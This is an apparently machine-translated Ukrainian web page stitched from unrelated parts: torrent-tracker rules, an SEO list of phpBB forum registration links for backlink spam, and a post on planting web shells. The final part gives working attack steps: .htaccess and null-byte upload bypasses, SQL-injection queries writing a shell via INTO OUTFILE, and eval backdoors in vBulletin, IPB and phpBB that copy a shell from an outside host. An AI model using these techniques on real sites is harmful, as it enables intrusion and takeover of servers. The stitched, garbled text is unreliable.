Матеріалізуються profile php mode. Способи заливання шеллу

Правила та обмеження на трекері.

1. Загальні положення та обмеження
1.1. Дані правила трекера не підлягають обговоренню та обов'язкові для виконання всіма, присутніми на трекері. Тільки Адміністраторам трекера дозволено не дотримуватись деяких положень правил у виняткових ситуаціях.
1.2. Адміністрація трекера є єдиною та вищою інстанцією, де можна вирішити будь-які конфліктні ситуації, що стосуються трекера та його користувачів. Таким чином, рішення Адміністраторів остаточні та оскарженню не підлягають.
1.3. Адміністрація Трекера залишає за собою право змінювати та доповнювати всі пункти цих правил без попереднього або подальшого повідомлення. Доповнення та зміни правил набирають чинності з моменту їх опублікування. Однак як акт доброї волі Адміністрація намагатиметься по можливості доводити такі зміни до користувачів.
1.4. Незнання цих та інших Правил Трекера не тільки не звільняє від відповідальності за їх порушення, а й саме по собі є порушенням і обставиною, що обтяжує вину.
1.5. Забороняється використовувати будь-які програми для фальсифікації даних про Ваш Upload"e та Download"e. Читери миттєво вирушають у бан.
1.7. Заборонено використання несправностей та помилок трекера в особистих цілях. У разі виявлення несправностей і помилок необхідно повідомити Адміністрацію Трекера.
2. Реєстрація
Реєстрація є невід'ємною частиною присутності на трекері. Проходження реєстрації автоматично означає Вашу згоду з цими Правилами. Якщо Ви не погоджуєтесь з цими Правилами, напишіть адміністрації.
2.1. ЗАБОРОНЯЄТЬСЯ РЕЄСТРАЦІЯ З РІЗНИХ ЗАРУБІЖНИХ ПРОКСІ-СЕРВЕРІВ. Порушникам - моментальний бан!
У виняткових випадках допускається після розгляду заявки адміністрацією.
2.2. ЗАБОРОНЯЄТЬСЯ РЕЄСТРАЦІЯ З ОДНОГО КОМП'ЮТЕРА БІЛЬШЕ ДВОХ АККАУНТІВ. При порушенні баняться всі наявні облікові записи.
Реєстрація нового облікового запису, після двох, можлива лише за згодою адміністрації.
3. Правила коментування роздач
3.1. Заборонено використання ненормативної лексики у коментарях до роздач, будь-які нецензурні слова та висловлювання, завуальований мат, у тому числі іноземними мовами.
Покарання: Видалення коментарів, що порушують правила, і заборона на написання коментарів терміном на 1 тиждень. При подальшому порушенні цього правила, бан строком на 7 днів та заборона на написання коментарів терміном на 14 днів. Надалі – перманентна заборона на написання коментарів.
3.2. Забороняється ображати учасників трекера у будь-якій формі. Заборонено прояв будь-якої грубості, особистих образ та нецензурних висловлювань щодо інших учасників, заподіяння шкоди їхній репутації, які принижують їхню честь та гідність, у тому числі публічне з'ясування особистих стосунків, як у особистих повідомленнях на трекері, так і в коментарях до роздачі. Учасники повинні дотримуватися поважної форми спілкування.
Покарання: Видалення коментарів, що порушують правила, і бан порушника строком на 7 днів. При подальшому порушенні цього правила, бан строком на 7 днів та заборона на написання коментарів терміном на 30 днів. Надалі – перманентна заборона на написання коментарів.
3.3. Заборонено загрози будь-якого характеру (віртуальні, реальні та інші загрози на адресу учасників трекера).
Покарання: Вилучення повідомлень та бан порушника терміном на 14 днів. У разі повторного порушення цього правила бан на місяць.
3.4. Заборонені флейм (повідомлення не по суті, покликані розв'язати суперечку, а також перехід на особи, що обговорюють), флуд (повідомлення, що не відповідають темі, не несуть смислового навантаження або складаються з одних тільки смайлів), оффтоп (повідомлення, що не належать до обговорюваної теми) , а також спонукання до флуду, флейму, офтопу та повідомлення типу: "Допоможіть", "Проблема", "А про що це ви, га?" або "Так я не зрозумів - звідки качати?" і їм подібні, що не належать до даної роздачі. В одному коментарі може бути не більше 3 смайлів.
Покарання: Видалення коментарів, що порушують правила, і попередження автора коментаря строком на 3 дні. При повторному порушенні цього правила автору коментаря видається заборона написання коментарів терміном 7 днів. Надалі при кожному порушенні видається заборона на залишення коментарів строком на 14 днів та заборона на завантаження терміном на 14 днів.
3.5. Заборонено в коментарях розміщення повідомлень комерційного характеру, прямої чи непрямої реклами, спам-розсилок та посилань на сайти, які безпосередньо не пов'язані з роздачею.
Покарання: Видалення реклами, заборона написання коментарів терміном 7 днів і заборона скачування терміном 7 днів. При повторному порушенні заборона написання коментарів терміном 15 днів і заборона скачування терміном 15 днів. Надалі перманентна заборона написання коментарів.
3.6. Заборонено у коментарях виявляти расову, національну та релігійну ворожість, агітувати політичні партії, пропагувати тероризм, екстремізм, наркотики, релігії та інші теми, несумісні із загальноприйнятими законами моралі та пристойності.
Покарання: Видалення коментарів, що порушують правила, заборона на написання коментарів терміном на 14 днів і заборона на скачування терміном на 14 днів. При повторному порушенні заборона написання коментарів терміном 30 днів і заборона скачування терміном 30 днів. Надалі перманентна заборона написання коментарів.
3.7. Заборонено залишати коментарі, які явно або приховано порушують КК РФ, а також повідомлення, що закликають до здійснення протиправних дій.
Покарання: Вилучення повідомлень, заборона написання коментарів терміном на 14 днів і заборона скачування терміном на 14 днів. У разі повторного порушення бан порушника строком на 30 днів. При третьому порушенні – перманентний бан.
3.8. Заборонено у коментарях до роздач розголошення будь-яких особистих даних користувачів, конфіденційних даних, справжніх П.І.Б., публікація фотографій, розповсюдження відомостей про приватне життя учасника обговорення, що становлять його особисту чи сімейну таємницю, без його згоди.
Покарання: Видалення коментарів, що порушують правила, та усне попередження учасника трекера. При повторному порушенні заборона написання коментарів терміном 7 днів. Надалі заборона написання коментарів терміном на 30 днів.
3.9. Заборонено викладення у коментарях зображень, що містять порнографію, сцени жорстокості або будь-які інші зображення, що принижують або ображають інших користувачів.
Покарання: Видалення коментарів, що порушують правила, і заборона на скачування та залишення коментарів строком на 7 днів. При повторному порушенні бан користувача терміном 7 днів. Надалі – бан терміном на 15 днів та перманентна заборона на написання коментарів.
3.10. Заборонено використовувати в коментарях мову, відмінну від російської, та шрифт, відмінний від кириличного.
Покарання: Видалення повідомлень та усне попередження користувача, при повторному порушенні правил цього пункту заборона написання коментарів терміном на 3 дні.
3.11. Заборонено використання в повідомленнях таких способів виділення: червоного кольору, більше 75% великих букв і шрифту великого розміру – це привілей модераторів та адміністраторів.
Покарання: Видалення повідомлень та усне попередження користувача, при повторному порушенні правил цього пункту заборона написання коментарів строком на 7 днів.
3.12. Заборонено оверквотинг (цитування повідомлень інших учасників у кількостях, що перевищують розумні (понад 10 рядків оригінального повідомлення)).
Покарання: Редагування повідомлення та усне попередження користувача, при повторному порушенні правил цього пункту заборона написання коментарів строком на 3 дні.
3.13. Забороняється спойлерити, та утримуйтесь від використання спойлерів (розкриття ключових моментів сюжету, знання яких може зіпсувати іншим враження від перегляду, результату матчу тощо).
Якщо ж обійтися без спойлерів не можна, потрібно обов'язково укласти спойлер в тег [еxpand] і ставити перед ним позначку «Спойлер».
Примітка: У "спортивних" роздачах забороняється спойлер до 11 коментаря (1 сторінка).
Покарання: Редагування повідомлення та усне попередження користувача. При повторному порушенні правил цього пункту заборона написання коментарів строком на 3 дні.
3.14. Забороняється публікація повідомлень, що містять свідомо неправдиву інформацію.
Покарання: Видалення коментарів, що порушують правила, і усне попередження користувача. У разі повторного порушення правил цього пункту заборона на залишення коментарів строком на 7 днів.
Система коментарів торентів створена для того, щоб:
- Висловити свою повагу та подяку тому, хто роздає,
- Задати конкретне питання щодо роздачі, що вас цікавить,
- Повідомити цікаву інформацію, що стосується роздачі.
4. Обмеження на аватари та підписи:
4.1. Підпис:
- Максимальна висота: 100 пікселів (тобто, не більше чотирьох юзербарів або десяти рядків тексту (розмір шрифту 10); ширина: 750 пікселів.
- Загальна вага зображень, що містяться у підписі, не повинна перевищувати 200 Kb.
- зміст: неприпустимі насильство, погрози (на демографічній, національній, релігійній чи політичній основі), лихослів'я (ненормативна лексика, обзивання, грубість тощо), розпуста (порнографія), дискримінація у будь-яких проявах, тексти та зображення рекламного чи комерційного характеру, імітація звань/рангів цього ресурсу, і навіть зображення провокаційного штибу, зокрема. використання нацистської символіки.
- Анімація: сильно миготливі підписи заборонені (ступінь миготіння визначається адміністрацією).
- Підпис під Вашими повідомленнями не може бути використаний для створення посилань на ресурси мережі. (Винятки становлять посилання на сайти з юзербарами, сервіси на зразок youtube, google і т.п.)
4.2. Аватар:
- максимальний розмір: 100х100 пікселів; вага: до 21 Кб.
- зміст: неприпустимі насильство, погрози (на демографічній, національній, релігійній чи політичній основі), лихослів'я (ненормативна лексика, обзивання, грубість тощо), розпуста (порнографія), дискримінація у будь-яких проявах, пропаганда наркотиків, комерційна реклама та рекламні тексти, імітація звань/рангів цього ресурсу, свідомість схожість з аватарами членів адміністрації, а також зображення провокаційного штибу, в т.ч. використання нацистської символіки.
- Анімація: сильно миготливі аватари заборонені (ступінь миготіння визначається адміністрацією).
Покарання: Видалення підпису та аватари, або заборона їх використання (визначається адміністратором).
5. Релізи
5.1. Забороняється перезаливати релізи на інші трекери без особистого дозволу релізера. Підтримка роздачі забороненого до перезаливу релізу на іншому трекері прирівнюється до самостійної перезатоки і карається у відповідність до п.7.
6. Інше
6.1. Забороняється закачування вмісту роздач з використанням файлообмінників типу vip-file, letitbit та інших...
6.2. Забороняється використання для закачування торрента будь-яких менеджерів закачувань.
7. Покарання:
За зазначені у пп.5-6 порушення – бан на 7 днів. При повторному порушенні даних пунктів правил – довічний бан.

Отже, думаю я нікого не здивую, сказавши, що чим більше зовнішніх посилань на Ваш сайт, тим більше його ТІЦ і чим більше ТІЦ сайту, що посилається, тим "вага" цього посилання більше. Існує багато способів збільшити масу посилань на Ваш сайт, але сьогодні я розповім тільки про один з них - отримання зовнішніх посилань із трастових сайтів.
У цій статті, я не даватиму всіх посилань на трастові сайти, які знаю, а розповім тільки про одні з них – форуми.
Реєструючись на форумах, де можна вказати сайт (Як правило, вони зроблені на одному движку), Ви отримаєте зовнішнє посилання.
Щоб було зрозуміло про що мова, перегляньте скріншот нижче:

Тобто Ви повинні просто зареєструватися на такому форумі, вказавши сайт. І все. (Ну максимум ще підтвердити реєстрацію, тому вказуйте реальний e-mail). Як правило, сторінка з посиланням на Ваш сайт буде виглядати приблизно так:

Тепер поговоримо про мінуси такого способу, на мій погляд їх два:
1) Думаю, рано чи пізно Вас видалять із форуму за неактивність (Але в принципі складного не складе зареєструватися заново).
2) Відповідно, не можна задати анкор посилання. (Це, напевно, навіть не мінус, а факт, але все ж таки).
Ну, тепер список жирних форумів. Для зручності в порядку зменшення ТИЦ:
Посилання (ТІЦ)
http://forum.igromania.ru/register.php (1700) [Реєструєтесь, потім у профілі вказуєте сайт, зберігаєте]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [У профілі вказуєте вебсайт]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)

http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [У профілі]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [У профілі]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________

Останнє оновлення бази було 16.06.11(Почищений список від непрацюючих посилань + додано ще кілька сайтів, що знаходяться під межею)

Також завдяки трастовим сайтом можна не тільки підвищити ТІЦ, а й збільшити відвідуваність сайту! Але для цього потрібно багато хороших сайтів, а вони, як правило, вже продаються за гроші. Ну, а купувати їх чи ні, вже вирішуйте самі...

На закінчення можу сказати, що не реєструйтесь за один раз, відразу на всіх форумах, інакше Ваш сайт може потрапити під який-небудь фільтр. По 5-8 на день, на мій погляд, достатньо. Всі. Успіхів. 😉

Увага!
Пишу цю примітку я в 2015 році і хочу сказати, що зараз, на мою думку, залишаючи посилання на свій блог (сайт) на цих або інших, нових трастових сайтах, ви тільки дарма витратите час. Тому, щоб уникнути повторюваних питань у коментарях, напишу тут - оновлень цього списку не буде.
Краще рекомендую ознайомитися з моїм списком. Звичайно, постінг повідомлень у таких блогах теж уже не такий ефективний як раніше, але, знову ж таки, на мою суб'єктивну думку, в рази більше.

Привіт %username% та його друзі. Ну от потрібно терміново залити шелл на сайт, ну мало, може, кінцевий гонорар від цього залежить. Ну, а ніяк не виходить. Ось зібрав пару прикладів (спасибі tracy та іншим за це).

Льєм шелл через картинку

Ви зламали сайт (зрозуміло тільки тестуєте) з самописною адмінкою ... І не можете залити веб-шелл, але там є заливка картинок і завантажує тільки формати.jpg, .gif, .png.
Що в цьому випадку можна зробити?

Пихаємо шелл з розширенням.gif в якусь папку з картинками, і створюємо файл.htaccess з вмістом

AddType application/x-httpd-php .gif
Ця команда виконає формат.gif як php
Пробуємо відкрити /shell.gif

Так само, якщо скрипт не байдужий до перенесення рядка, намагаємося залити шелл попутно перейменувавши його в shell.php%00.jpg, перевіряти доступність shell.php, а раптом?

Спосіб заливання шеллу через mysql.user зі вилиці

1) Дізнаємося з-під кого ми сидимо і дізнаємося так само його права до mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Дізнаємося під ким ми сидимо)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" наш користувач "+--+
(Перевіримо привілеї нашого користувача. Якщо видає помилку при виведенні, можна похексити нашого користувача 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Шлях до файлу "+--+
(Заливаємо міні-шелл)
P.S
Що б все вийшло, потрібно мати права на запис і знати повний шлях до кореня.
Також перевірити права на запис можна так:

site.com/index.php?id=1+and+1=0+union+Select+1," prava ",3+from+mysql.user+--+
Якщо prava відобразиться, то є права.

Наступна ситуація. Ми в адмінці форуму vBulletin

Заходимо:
Plugins & Products -> Plugin Manager -> Плагіни & Продукти -> Менеджер плагінів -> [Додати новий плагін]

Вибираємо темптлей. Зазвичай вибираємо faq_complete, вибираємо та тиснемо галочку Plugin is Active виставляємо «Yes» та зберігаємо.

localhost/forum/faq.php?cmd=phpinfo();

Якщо ми вивели phpinfo(), то вважайте шелл у нас в руках.

Далі у phpinfo потрібно знайти повний шлях до форуму (наприклад /home/u0000/site.ru/www/sell.php). Далі нам потрібно наш веб-шелл перетворити на txt файл та залити на будь-який сайт
mysite.com/shell.txt
Шелл заливаємо командою

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Що робить ця команда? Вона копіює вміст змінної [a] у змінну [b], тобто shell.txt копіює у shell.php

Заливаємо шелл у IPB 3

Заходимо:
Підтримка->Управління SQL->Виконуються процеси->Виконати новий запит

Код:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
Повний шлях можна подивитись так:

Адмінка->Підтримка
Там буде зверху написано версію PHP і зліва посилання на PHPINFO

Шелл тут:
http://site.com/uploads/shell.php

Заливаємо шелл у phpBB 2

1. Створюємо файл ex.sql
2. Прописуємо туди

UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Де user_id=2 – ідентифікатор адміністратора

3. Заходимо до адмін-панелі
4. В адмін-панелі вибираємо пункт «Відновити БД» та завантажуємо ex.sql
5. Виконуємо код / ​​Заливаємо шелл так

Заходимо:
http://target/profile.php?mode=editprofile&e=phpinfo();
Після:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
Щоб вивести phpinfo() потрібно бути авторизованим.

Це тільки короткий список, як і на які двигуни можна залити шелл. Потрібно більше? Welcome до хлопців на rdot
заливання на форуми
заливка на cms
А ось і мій улюблений шелл, теж на rdot))